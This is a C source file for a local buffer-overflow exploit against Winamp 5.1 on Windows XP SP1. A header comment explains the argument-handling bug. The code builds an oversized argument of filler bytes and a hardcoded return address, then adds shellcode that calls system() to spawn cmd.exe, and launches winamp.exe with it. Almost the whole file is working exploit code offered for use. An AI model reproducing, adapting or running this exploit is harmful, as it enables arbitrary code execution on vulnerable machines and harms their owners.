/* 
 *       Copyright © Rosiello Security
 *
 *           http://www.rosiello.org
 * 
 * 
 * Winamp_5-1_ex.c (Windows XP Pro + sp1)
 *  ____           _      _ _               _       _  _   _
 * |  _ \ ___  ___(_) ___| | | ___     __ _| |_   _| || |_/ |
 * | |_) / _ \/ __| |/ _ \ | |/ _ \   / _` | __| |_  ..  _| |
 * |  _ < (_) \__ \ |  __/ | | (_) | | (_| | |_  |_      _| |
 * |_| \_\___/|___/_|\___|_|_|\___/   \__,_|\__|   |_||_| |_|
 *
 *
 *   ---[ @Wizard@ local Winamp V5.1 exploiter ]---
 *
 *
 * In December of this year (2003) a good friend of mine "b0f" reported this bug in an advisory  
 * at www.b0f.net
 *
 * (BUG:)
 *
 * There is a simple Buffer overflow in argument handeling routine for Winamp version 5.1.
 *  
 *
 *
 * just type: 
 *
 *
 * C:\\Progra~1\\Winamp\\winamp.exe  AAAAAAAAA....[517 chars]...AAAAAAAAAAAA 
 * winamp.exe will crash 
 *
 *
 * This bug was never exploited so that was my quest.
 *
 * The shellcode requires  
 * 
 * system        (msvcrt.dll)
 *
 * AUTHOR  : Johnny Mast
 * CONTACT: rave@rosiello.org
 */ 
 

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <windows.h>
#include <winbase.h>
#define SYS_ADR "\x44\x80\xbf\x77"
#define EIP "\x80\xd4\x12\x00\x00" 
 
char shellcode[]= 
"\x90\x90\x90"
"\x90\x90\x90"
"\x90\x90\x90"
"\x90\x90\x90"
 
"\x8b\xec"       // mov ebp,esp
"\x55"             // push ebp
"\x68\x65\x78\x65\x20"     // push "exe "
"\x68\x63\x6d\x64\x2e"     // push "cmd."
"\x8d\x45\xf4"             // lea eax,[ebp-0xC]
"\x50"           // push eax
"\xb8" SYS_ADR        // mov eax,77BF8044h
"\xff\xD0";       // call eax
 

int main(void)
{
  FILE *fd    ;
  char buffer[1024]  ;
  char whoops[1024 *2]="C:\\Progra~1\\Winamp\\winamp.exe ";
  int i    ;
 
  memset( buffer,0x00,1024 )  ;
  memset( buffer,0x41,260 )  ;
 
  strcat( buffer,EIP )    ;
  
  execlp(whoops,whoops,buffer,shellcode,NULL);
}